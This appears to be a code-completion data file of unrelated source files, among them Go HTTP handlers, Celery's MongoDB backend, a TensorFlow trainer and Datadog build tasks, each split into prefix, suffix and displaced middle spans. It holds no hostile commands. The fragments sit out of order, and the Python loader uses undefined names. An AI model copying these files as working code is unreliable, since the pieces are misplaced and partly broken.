eprintln!("Can't write password: {}", e);
process::exit(1);
});
}
let config_path = get_config_path();
if !config_path.exists() {
println!("Generating config file at {}", config_path.display());
let config = Config::default();
config.write_file().unwrap_or_else(|e| {
eprintln!("Can't write config file: {}", e);
process::exit(1);
});
return config;
}
Config::read_file().unwrap_or_else(|e| {
eprintln!("{}", e);
process::exit(1);
})
}
| {
let base_dir = dirs::data_dir().expect("Unable to determine the data directory");
base_dir.join(env!("CARGO_PKG_NAME"))
} |
various.go | package genworldvoronoi
import (
"math"
"sort"
"github.com/Flokey82/go_gens/vectors"
)
// dist2 returns the eucledian distance between two points.
func dist2(a, b [2]float64) float64 {
xDiff := a[0] - b[0]
yDiff := a[1] - b[1]
return float64(math.Sqrt(float64(xDiff*xDiff + yDiff*yDiff)))
}
// min is the int equivalent of math.Min(a, b).
func min(a, b int) int |
// minMax returns the smallest and largest value in hm.
func minMax(hm []float64) (float64, float64) {
if len(hm) == 0 {
return 0, 0
}
min, max := hm[0], hm[0]
for _, h := range hm {
if h > max {
max = h
}
if h < min {
min = h
}
}
return min, max
}
func convToMap(in []int) map[int]bool {
res := make(map[int]bool)
for _, v := range in {
res[v] = true
}
return res
}
func convToArray(in map[int]bool) []int {
var res []int
for v := range in {
res = append(res, v)
}
sort.Ints(res)
return res
}
// convToVec3 converts a float slice containing 3 values into a vectors.Vec3.
func convToVec3(xyz []float64) vectors.Vec3 {
return vectors.Vec3{xyz[0], xyz[1], xyz[2]}
}
func degToRad(deg float64) float64 {
return deg * math.Pi / 180
}
func radToDeg(rad float64) float64 {
return rad * 180 / math.Pi
}
| {
if a < b {
return a
}
return b
} |
data_ingredient.py | from math import floor
import numpy as np
from .graph import load_edge_list, load_adjacency_matrix
from .graph_dataset import BatchedDataset
from ..config_loader import get_config
def load_dataset():
data_config = get_config().data
if graph_data_type == "edge":
idx, objects, weights = load_edge_list(data_config.path, data_config.symmetrize,
delimiter=data_config.delimiter)
else:
idx, objects, weights = load_adjacency_matrix(data_config.path,
data_config.graph_data_format,
data_config.symmetrize)
# define a feature function
if data_config.object_id_to_feature_func == "conceptnet":
features = [' '.join(object_id.split('_')) for object_id in objects]
elif data_config.object_id_to_feature_func == "wordnet":
# placental_mammal.n.01 -> placental mammal
features = [' '.join(object_id.split('.')[0].split('_')) for object_id in objects]
elif data_config.object_id_to_feature_func == "id":
# xyz -> xyz
|
else:
features = None
if make_eval_split:
np.random.seed(data_config.split_seed)
shuffle_order = np.arange(idx.shape[0])
np.random.shuffle(shuffle_order)
num_eval = floor(idx.shape[0] * data_config.split_size)
eval_indices = shuffle_order[:num_eval]
train_indices = shuffle_order[num_eval:]
train_idx = idx[train_indices]
train_weights = weights[train_indices]
eval_idx = idx[eval_indices]
eval_weights = weights[eval_indices]
train_data = BatchedDataset(
train_idx,
objects,
train_weights,
data_config.manifold,
data_config.n_graph_neighbors,
data_config.n_manifold_neighbors,
data_config.n_rand_neighbors,
data_config.batch_size,
data_config.num_workers,
data_config.nn_workers,
data_config.manifold_nn_k,
features,
saved_data_file=data_config.graph_data_file,
gen_data=data_config.gen_graph_data
)
eval_data = BatchedDataset.initialize_eval_dataset(
train_data,
eval_batch_size,
data_config.n_eval_neighbors,
data_config.max_eval_graph_neighbors,
data_config.eval_workers,
data_config.eval_nn_workers,
manifold_neighbors=data_config.eval_manifold_neighbors,
eval_edges=eval_idx,
eval_weights=eval_weights)
return train_data, eval_data
else:
train_data = BatchedDataset(
idx,
objects,
weights,
manifold,
data_config.n_graph_neighbors,
data_config.n_manifold_neighbors,
data_config.n_rand_neighbors,
data_config.batch_size,
data_config.num_workers,
data_config.nn_workers,
data_config.manifold_nn_k,
features,
saved_data_file=data_config.graph_data_file,
gen_data=data_config.gen_graph_data)
eval_data = BatchedDataset.initialize_eval_dataset(
train_data,
data_config.eval_batch_size,
data_config.n_eval_neighbors,
data_config.max_eval_graph_neighbors,
data_config.eval_workers,
data_config.eval_nn_workers,
manifold_neighbors=data_config.eval_manifold_neighbors,
saved_data_file=data_config.graph_data_file,
gen_data=data_config.gen_graph_data)
return train_data, eval_data
def get_adjacency_dict(data):
adj = {}
for row in data.idx:
x = row[0]
y = row[1]
if x in adj:
adj[x].add(y)
else:
adj[x] = {y}
return adj
| features = [object_id for object_id in objects] |
algorithms_bad.ts | /* eslint-disable max-lines-per-function */
const myMeasureSystem = 'US';
const myCircle: Shape = { name: 'CIRCLE', radius: 5 };
const myArea = getArea(myCircle);
const myUnits = getUnitName(myMeasureSystem);
const areaDescription = `My ${myCircle.name} occupies an area of ${myArea} ${myUnits}`;
console.log(areaDescription);
type Shape = { name: string; base?: number; height?: number; width?: number; radius?: number };
// ❌ high cyclomatic complexity
export function getArea(shape: Shape): number {
const PI = 3.14;
const HALVE = 0.5;
let area: number;
// ❌ switch cases don´t scale well
switch (shape.name) {
case 'TRIANGLE':
area = shape.base * shape.height * HALVE;
break;
case 'SQUARE':
area = shape.height * shape.height;
break;
case 'RECTANGLE':
area = shape.height * shape.width;
break;
case 'CIRCLE':
area = PI * shape.radius * shape.radius;
break;
// ❌ more cases implies change the code | return area;
}
// 🚨 it seems a naive if condition, but...
export function getUnitName(measureSystem: string): string {
if (measureSystem === 'US') {
return 'square yards';
} else {
return 'square metres';
}
}
// ❌ there are duplicated logic
export function getUnitSymbol(measureSystem: string): string {
if (measureSystem === 'US') {
return 'yd2';
} else {
return 'm2';
}
}
// 🔥 and can need another else or a switch if there is another case | default:
throw new Error('shape not recognized');
} |
project_revisions.py | """
Ory APIs
Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers. # noqa: E501
The version of the OpenAPI document: v0.0.1-alpha.93
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from ory_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from ory_client.exceptions import ApiAttributeError
def lazy_import():
from ory_client.model.project_revision import ProjectRevision
globals()['ProjectRevision'] = ProjectRevision
class ProjectRevisions(ModelSimple):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'value': ([ProjectRevision],),
}
@cached_property
def discriminator():
return None
attribute_map = {}
read_only_vars = set()
_composed_schemas = None
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs):
"""ProjectRevisions - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] ([ProjectRevision]): # noqa: E501
Keyword Args:
value ([ProjectRevision]): # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop('_path_to_item', ())
if 'value' in kwargs:
value = kwargs.pop('value')
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
) |
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
"""ProjectRevisions - a model defined in OpenAPI
Note that value can be passed either in args or in kwargs, but not in both.
Args:
args[0] ([ProjectRevision]): # noqa: E501
Keyword Args:
value ([ProjectRevision]): # noqa: E501
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
# required up here when default value is not given
_path_to_item = kwargs.pop('_path_to_item', ())
self = super(OpenApiModel, cls).__new__(cls)
if 'value' in kwargs:
value = kwargs.pop('value')
elif args:
args = list(args)
value = args.pop(0)
else:
raise ApiTypeError(
"value is required, but not passed in args or kwargs and doesn't have default",
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.value = value
if kwargs:
raise ApiTypeError(
"Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
kwargs,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
return self | |
api_handlers.go | package main
import (
"encoding/json"
"log"
"net/http"
"github.com/gorilla/mux"
)
// getServer is the handler to get a specific server by name. it's called the same way
// as if the standard net/http library called it, except we're guaranteed that it's called
// only if the specific request format (laid out in gorilla_server.go) is met
func getServer(w http.ResponseWriter, r *http.Request) {
// mux.Vars gets a map of path variables by name. here "name" matches the {name} path
// variable as seen in gorilla_server.go
name, ok := mux.Vars(r)["name"]
if !ok |
mx.RLock()
defer mx.RUnlock()
server, ok := servers[name]
if !ok {
http.Error(w, "no such server", http.StatusNotFound)
return
}
if err := json.NewEncoder(w).Encode(server); err != nil {
log.Printf("[JSON Encoding Error] %s", err)
http.Error(w, err.Error(), http.StatusInternalServerError)
}
}
// reserveServer is the handler to reserve a specific server by name
func reserveServer(w http.ResponseWriter, r *http.Request) {
name, ok := mux.Vars(r)["name"]
if !ok {
http.Error(w, "name missing in URL path", http.StatusBadRequest)
return
}
mx.Lock()
defer mx.Unlock()
server, ok := servers[name]
if !ok {
http.Error(w, "no such server", http.StatusNotFound)
return
}
server.Reserved = true
server.NumReservations++
if err := json.NewEncoder(w).Encode(server); err != nil {
log.Printf("[JSON Encoding Error] %s", err)
http.Error(w, err.Error(), http.StatusInternalServerError)
}
}
// releaseServer is the handler to release a specific server by name
func releaseServer(w http.ResponseWriter, r *http.Request) {
name, ok := mux.Vars(r)["name"]
if !ok {
http.Error(w, "name missing in URL path", http.StatusBadRequest)
return
}
mx.Lock()
defer mx.Unlock()
server, ok := servers[name]
if !ok {
http.Error(w, "no such server", http.StatusNotFound)
return
}
server.Reserved = false
if err := json.NewEncoder(w).Encode(server); err != nil {
log.Printf("[JSON Encoding Error] %s", err)
http.Error(w, err.Error(), http.StatusInternalServerError)
}
}
| {
http.Error(w, "name missing in URL path", http.StatusBadRequest)
return
} |
trainer.py | # Copyright (C) 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A function that trains a network on a dataset."""
from lottery_ticket.foundations import paths
from lottery_ticket.foundations import save_restore
import tensorflow as tf
def train(sess, dataset, model, optimizer_fn, training_len, output_dir,
**params):
"""Train a model on a dataset. | Training continues until training_len iterations or epochs have taken place.
Args:
sess: A tensorflow session
dataset: The dataset on which to train (a child of dataset_base.DatasetBase)
model: The model to train (a child of model_base.ModelBase)
optimizer_fn: A function that, when called, returns an instance of an
optimizer object to be used to optimize the network.
training_len: A tuple whose first value is the unit of measure
("epochs" or "iterations") and whose second value is the number of
units for which the network should be trained.
output_dir: The directory to which any output should be saved.
**params: Other parameters.
save_summaries is whether to save summary data.
save_network is whether to save the network before and after training.
test_interval is None if the test set should not be evaluated; otherwise,
frequency (in iterations) at which the test set should be run.
validate_interval is analogous to test_interval.
Returns:
A dictionary containing the weights before training and the weights after
training, as well as the trained model.
"""
# Create initial session parameters.
optimize = optimizer_fn().minimize(model.loss)
sess.run(tf.global_variables_initializer())
initial_weights = model.get_current_weights(sess)
train_handle = dataset.get_train_handle(sess)
test_handle = dataset.get_test_handle(sess)
validate_handle = dataset.get_validate_handle(sess)
# Optional operations to perform before training.
if params.get('save_summaries', False):
writer = tf.summary.FileWriter(paths.summaries(output_dir))
train_file = tf.gfile.GFile(paths.log(output_dir, 'train'), 'w')
test_file = tf.gfile.GFile(paths.log(output_dir, 'test'), 'w')
validate_file = tf.gfile.GFile(paths.log(output_dir, 'validate'), 'w')
if params.get('save_network', False):
save_restore.save_network(paths.initial(output_dir), initial_weights)
save_restore.save_network(paths.masks(output_dir), model.masks)
# Helper functions to collect and record summaries.
def record_summaries(iteration, records, fp):
"""Records summaries obtained from evaluating the network.
Args:
iteration: The current training iteration as an integer.
records: A list of records to be written.
fp: A file to which the records should be logged in an easier-to-parse
format than the tensorflow summary files.
"""
if params.get('save_summaries', False):
log = ['iteration', str(iteration)]
for record in records:
# Log to tensorflow summaries for tensorboard.
writer.add_summary(record, iteration)
# Log to text file for convenience.
summary_proto = tf.Summary()
summary_proto.ParseFromString(record)
value = summary_proto.value[0]
log += [value.tag, str(value.simple_value)]
fp.write(','.join(log) + '\n')
def collect_test_summaries(iteration):
if (params.get('save_summaries', False) and
'test_interval' in params and
iteration % params['test_interval'] == 0):
sess.run(dataset.test_initializer)
records = sess.run(model.test_summaries, {dataset.handle: test_handle})
record_summaries(iteration, records, test_file)
def collect_validate_summaries(iteration):
if (params.get('save_summaries', False) and
'validate_interval' in params and
iteration % params['validate_interval'] == 0):
sess.run(dataset.validate_initializer)
records = sess.run(model.validate_summaries,
{dataset.handle: validate_handle})
record_summaries(iteration, records, validate_file)
# Train for the specified number of epochs. This behavior is encapsulated
# in a function so that it is possible to break out of multiple loops
# simultaneously.
def training_loop():
"""The main training loop encapsulated in a function."""
iteration = 0
epoch = 0
last_train_acc = None
while True:
sess.run(dataset.train_initializer)
epoch += 1
# End training if we have passed the epoch limit.
if training_len[0] == 'epochs' and epoch > training_len[1]:
return last_train_acc
# One training epoch.
while True:
try:
iteration += 1
# End training if we have passed the iteration limit.
if training_len[0] == 'iterations' and iteration > training_len[1]:
return last_train_acc
# Train.
results = sess.run([optimize, model.accuracy] + model.train_summaries,
{dataset.handle: train_handle})
last_train_acc = results[1]
records = results[2:]
record_summaries(iteration, records, train_file)
# Collect test and validation data if applicable.
collect_test_summaries(iteration)
collect_validate_summaries(iteration)
# End of epoch handling.
except tf.errors.OutOfRangeError:
break
# Run the training loop.
final_train_acc = training_loop()
# Clean up.
if params.get('save_summaries', False):
train_file.close()
test_file.close()
validate_file.close()
# Retrieve the final weights of the model.
final_weights = model.get_current_weights(sess)
if params.get('save_network', False):
save_restore.save_network(paths.final(output_dir), final_weights)
return initial_weights, final_weights, final_train_acc | |
mongodb.py | # -*- coding: utf-8 -*-
"""MongoDB result store backend."""
from __future__ import absolute_import, unicode_literals
from datetime import datetime, timedelta
from kombu.exceptions import EncodeError
from kombu.utils.objects import cached_property
from kombu.utils.url import maybe_sanitize_url, urlparse
from celery import states
from celery.exceptions import ImproperlyConfigured
from celery.five import items, string_t
from .base import BaseBackend
try:
import pymongo
except ImportError: # pragma: no cover
pymongo = None # noqa
if pymongo:
try:
from bson.binary import Binary
except ImportError: # pragma: no cover
from pymongo.binary import Binary # noqa
from pymongo.errors import InvalidDocument # noqa
else: # pragma: no cover
Binary = None # noqa
class InvalidDocument(Exception): # noqa
pass
__all__ = ('MongoBackend',)
BINARY_CODECS = frozenset(['pickle', 'msgpack'])
class MongoBackend(BaseBackend):
"""MongoDB result backend.
Raises:
celery.exceptions.ImproperlyConfigured:
if module :pypi:`pymongo` is not available.
"""
mongo_host = None
host = 'localhost'
port = 27017
user = None
password = None
database_name = 'celery'
taskmeta_collection = 'celery_taskmeta'
groupmeta_collection = 'celery_groupmeta'
max_pool_size = 10
options = None
supports_autoexpire = False
_connection = None
def __init__(self, app=None, **kwargs):
self.options = {}
super(MongoBackend, self).__init__(app, **kwargs)
if not pymongo:
raise ImproperlyConfigured(
'You need to install the pymongo library to use the '
'MongoDB backend.')
# Set option defaults
for key, value in items(self._prepare_client_options()):
self.options.setdefault(key, value)
# update conf with mongo uri data, only if uri was given
if self.url:
self.url = self._ensure_mongodb_uri_compliance(self.url)
uri_data = pymongo.uri_parser.parse_uri(self.url)
# build the hosts list to create a mongo connection
hostslist = [
'{0}:{1}'.format(x[0], x[1]) for x in uri_data['nodelist']
]
self.user = uri_data['username']
self.password = uri_data['password']
self.mongo_host = hostslist
if uri_data['database']:
# if no database is provided in the uri, use default
self.database_name = uri_data['database']
self.options.update(uri_data['options'])
# update conf with specific settings
config = self.app.conf.get('mongodb_backend_settings')
if config is not None:
if not isinstance(config, dict):
raise ImproperlyConfigured(
'MongoDB backend settings should be grouped in a dict')
config = dict(config) # don't modify original
if 'host' in config or 'port' in config:
# these should take over uri conf
self.mongo_host = None
self.host = config.pop('host', self.host)
self.port = config.pop('port', self.port)
self.mongo_host = config.pop('mongo_host', self.mongo_host)
self.user = config.pop('user', self.user)
self.password = config.pop('password', self.password)
self.database_name = config.pop('database', self.database_name)
self.taskmeta_collection = config.pop(
'taskmeta_collection', self.taskmeta_collection,
)
self.groupmeta_collection = config.pop(
'groupmeta_collection', self.groupmeta_collection,
)
self.options.update(config.pop('options', {}))
self.options.update(config)
@staticmethod
def _ensure_mongodb_uri_compliance(url):
parsed_url = urlparse(url)
if not parsed_url.scheme.startswith('mongodb'):
url = 'mongodb+{}'.format(url)
if url == 'mongodb://':
url += 'localhost'
return url
def _prepare_client_options(self):
if pymongo.version_tuple >= (3,):
return {'maxPoolSize': self.max_pool_size}
else: # pragma: no cover
return {'max_pool_size': self.max_pool_size,
'auto_start_request': False}
def _get_connection(self):
"""Connect to the MongoDB server."""
if self._connection is None:
from pymongo import MongoClient
host = self.mongo_host
if not host:
# The first pymongo.Connection() argument (host) can be
# a list of ['host:port'] elements or a mongodb connection
# URI. If this is the case, don't use self.port
# but let pymongo get the port(s) from the URI instead.
# This enables the use of replica sets and sharding.
# See pymongo.Connection() for more info.
host = self.host
if isinstance(host, string_t) \
and not host.startswith('mongodb://'):
host = 'mongodb://{0}:{1}'.format(host, self.port)
# don't change self.options
conf = dict(self.options)
conf['host'] = host
if self.user:
conf['username'] = self.user
if self.password:
conf['password'] = self.password
self._connection = MongoClient(**conf)
return self._connection
def encode(self, data):
if self.serializer == 'bson':
# mongodb handles serialization
return data
payload = super(MongoBackend, self).encode(data)
# serializer which are in a unsupported format (pickle/binary)
if self.serializer in BINARY_CODECS:
payload = Binary(payload)
return payload
def decode(self, data):
if self.serializer == 'bson':
return data
payload = self.encode(data)
return super(MongoBackend, self).decode(payload) | def _store_result(self, task_id, result, state,
traceback=None, request=None, **kwargs):
"""Store return value and state of an executed task."""
meta = self._get_result_meta(result=result, state=state,
traceback=traceback, request=request)
# Add the _id for mongodb
meta['_id'] = task_id
try:
self.collection.replace_one({'_id': task_id}, meta, upsert=True)
except InvalidDocument as exc:
raise EncodeError(exc)
return result
def _get_task_meta_for(self, task_id):
"""Get task meta-data for a task by id."""
obj = self.collection.find_one({'_id': task_id})
if obj:
return self.meta_from_decoded({
'task_id': obj['_id'],
'status': obj['status'],
'result': self.decode(obj['result']),
'date_done': obj['date_done'],
'traceback': self.decode(obj['traceback']),
'children': self.decode(obj['children']),
})
return {'status': states.PENDING, 'result': None}
def _save_group(self, group_id, result):
"""Save the group result."""
meta = {
'_id': group_id,
'result': self.encode([i.id for i in result]),
'date_done': datetime.utcnow(),
}
self.group_collection.replace_one({'_id': group_id}, meta, upsert=True)
return result
def _restore_group(self, group_id):
"""Get the result for a group by id."""
obj = self.group_collection.find_one({'_id': group_id})
if obj:
return {
'task_id': obj['_id'],
'date_done': obj['date_done'],
'result': [
self.app.AsyncResult(task)
for task in self.decode(obj['result'])
],
}
def _delete_group(self, group_id):
"""Delete a group by id."""
self.group_collection.delete_one({'_id': group_id})
def _forget(self, task_id):
"""Remove result from MongoDB.
Raises:
pymongo.exceptions.OperationsError:
if the task_id could not be removed.
"""
# By using safe=True, this will wait until it receives a response from
# the server. Likewise, it will raise an OperationsError if the
# response was unable to be completed.
self.collection.delete_one({'_id': task_id})
def cleanup(self):
"""Delete expired meta-data."""
self.collection.delete_many(
{'date_done': {'$lt': self.app.now() - self.expires_delta}},
)
self.group_collection.delete_many(
{'date_done': {'$lt': self.app.now() - self.expires_delta}},
)
def __reduce__(self, args=(), kwargs=None):
kwargs = {} if not kwargs else kwargs
return super(MongoBackend, self).__reduce__(
args, dict(kwargs, expires=self.expires, url=self.url))
def _get_database(self):
conn = self._get_connection()
db = conn[self.database_name]
if self.user and self.password:
source = self.options.get(
'authsource',
self.database_name or 'admin'
)
if not db.authenticate(self.user, self.password, source=source):
raise ImproperlyConfigured(
'Invalid MongoDB username or password.')
return db
@cached_property
def database(self):
"""Get database from MongoDB connection.
performs authentication if necessary.
"""
return self._get_database()
@cached_property
def collection(self):
"""Get the meta-data task collection."""
collection = self.database[self.taskmeta_collection]
# Ensure an index on date_done is there, if not process the index
# in the background. Once completed cleanup will be much faster
collection.create_index('date_done', background=True)
return collection
@cached_property
def group_collection(self):
"""Get the meta-data task collection."""
collection = self.database[self.groupmeta_collection]
# Ensure an index on date_done is there, if not process the index
# in the background. Once completed cleanup will be much faster
collection.create_index('date_done', background=True)
return collection
@cached_property
def expires_delta(self):
return timedelta(seconds=self.expires)
def as_uri(self, include_password=False):
"""Return the backend as an URI.
Arguments:
include_password (bool): Password censored if disabled.
"""
if not self.url:
return 'mongodb://'
if include_password:
return self.url
if ',' not in self.url:
return maybe_sanitize_url(self.url)
uri1, remainder = self.url.split(',', 1)
return ','.join([maybe_sanitize_url(uri1), remainder]) | |
trace_agent.py | import os
import sys
import shutil
import invoke
from invoke import task
from .utils import bin_name, get_build_flags, get_version_numeric_only, load_release_versions
from .utils import REPO_PATH
from .build_tags import get_build_tags, get_default_build_tags, LINUX_ONLY_TAGS, REDHAT_AND_DEBIAN_ONLY_TAGS, REDHAT_AND_DEBIAN_DIST
from .go import deps
BIN_PATH = os.path.join(".", "bin", "trace-agent")
DEFAULT_BUILD_TAGS = [
"netcgo",
"secrets",
"docker",
"kubeapiserver",
"kubelet",
]
@task
def build(ctx, rebuild=False, race=False, precompile_only=False, build_include=None,
build_exclude=None, major_version='7', python_runtimes='3', arch="x64"):
"""
Build the trace agent.
"""
# get env prior to windows sources so we only have to set the target architecture once
ldflags, gcflags, env = get_build_flags(ctx, arch=arch, major_version=major_version, python_runtimes=python_runtimes)
# generate windows resources
if sys.platform == 'win32':
windres_target = "pe-x86-64"
if arch == "x86":
env["GOARCH"] = "386"
windres_target = "pe-i386"
ver = get_version_numeric_only(ctx, env, major_version=major_version)
maj_ver, min_ver, patch_ver = ver.split(".")
ctx.run("windmc --target {target_arch} -r cmd/trace-agent/windows_resources cmd/trace-agent/windows_resources/trace-agent-msg.mc".format(target_arch=windres_target))
ctx.run("windres --define MAJ_VER={maj_ver} --define MIN_VER={min_ver} --define PATCH_VER={patch_ver} -i cmd/trace-agent/windows_resources/trace-agent.rc --target {target_arch} -O coff -o cmd/trace-agent/rsrc.syso".format(
maj_ver=maj_ver,
min_ver=min_ver,
patch_ver=patch_ver,
target_arch=windres_target
))
build_include = DEFAULT_BUILD_TAGS if build_include is None else build_include.split(",")
build_exclude = [] if build_exclude is None else build_exclude.split(",")
if not sys.platform.startswith('linux'):
for ex in LINUX_ONLY_TAGS:
if ex not in build_exclude:
build_exclude.append(ex)
build_tags = get_build_tags(build_include, build_exclude)
cmd = "go build {race_opt} {build_type} -tags \"{go_build_tags}\" "
cmd += "-o {agent_bin} -gcflags=\"{gcflags}\" -ldflags=\"{ldflags}\" {REPO_PATH}/cmd/trace-agent"
args = {
"race_opt": "-race" if race else "",
"build_type": "-a" if rebuild else ("-i" if precompile_only else ""),
"go_build_tags": " ".join(build_tags),
"agent_bin": os.path.join(BIN_PATH, bin_name("trace-agent", android=False)),
"gcflags": gcflags,
"ldflags": ldflags,
"REPO_PATH": REPO_PATH,
}
ctx.run("go generate {REPO_PATH}/pkg/trace/info".format(**args), env=env)
ctx.run(cmd.format(**args), env=env)
@task
def integration_tests(ctx, install_deps=False, race=False, remote_docker=False):
"""
Run integration tests for trace agent
"""
if install_deps:
deps(ctx)
test_args = {
"go_build_tags": " ".join(get_default_build_tags()),
"race_opt": "-race" if race else "",
"exec_opts": "",
}
if remote_docker:
test_args["exec_opts"] = "-exec \"inv docker.dockerize-test\""
go_cmd = 'INTEGRATION=yes go test {race_opt} -v'.format(**test_args)
prefixes = [
"./pkg/trace/test/testsuite/...",
]
for prefix in prefixes:
ctx.run("{} {}".format(go_cmd, prefix))
@task
def cross_compile(ctx, tag=""):
"""
Cross-compiles the trace-agent binaries. Use the "--tag=X" argument to specify build tag.
"""
if not tag:
print("Argument --tag=<version> is required.")
return
print("Building tag %s..." % tag)
env = { | ctx.run("git checkout $V", env=env)
ctx.run("mkdir -p ./bin/trace-agent/$V", env=env)
ctx.run("go generate ./pkg/trace/info", env=env)
ctx.run("go get -u github.com/karalabe/xgo")
ctx.run("xgo -dest=bin/trace-agent/$V -go=1.11 -out=trace-agent-$V -targets=windows-6.1/amd64,linux/amd64,darwin-10.11/amd64 ./cmd/trace-agent", env=env)
ctx.run("mv ./bin/trace-agent/$V/trace-agent-$V-windows-6.1-amd64.exe ./bin/trace-agent/$V/trace-agent-$V-windows-amd64.exe", env=env)
ctx.run("mv ./bin/trace-agent/$V/trace-agent-$V-darwin-10.11-amd64 ./bin/trace-agent/$V/trace-agent-$V-darwin-amd64 ", env=env)
ctx.run("git checkout -")
print("Done! Binaries are located in ./bin/trace-agent/%s" % tag) | "TRACE_AGENT_VERSION": tag,
"V": tag,
}
|
app.component.ts | import {Component, ViewChild} from '@angular/core';
import {ActivatedRoute} from '@angular/router';
import {forEach} from '@angular/router/src/utils/collection';
import {CooTableConfig} from '../../../src/model/coo-table-config.model';
import {CooTableService} from './modules/table/coo-table.service';
import {Listing} from './modules/table/model/listing';
import {ListingMetadata} from './modules/table/model/listing-metadata';
import {ListingParameters} from './modules/table/model/listing-query-params.model';
import {CooTableFilterEvent} from './modules/table/plugins/coo-table-filters/coo-table-filter.event';
import {CooTablePagerEvent} from './modules/table/plugins/coo-table-pager/coo-table-pager.event';
import {CooTableRowSelectEvent} from './modules/table/plugins/coo-table-rowselect/coo-table-rowselect.event';
import {CooTableSearchEvent} from './modules/table/plugins/coo-table-search/coo-table-search.event';
import {CooTableSorterEvent} from './modules/table/plugins/coo-table-sorter/coo-table-sorter.event';
import {Wine} from './wines/wine';
import {WineService} from './wines/wine.service';
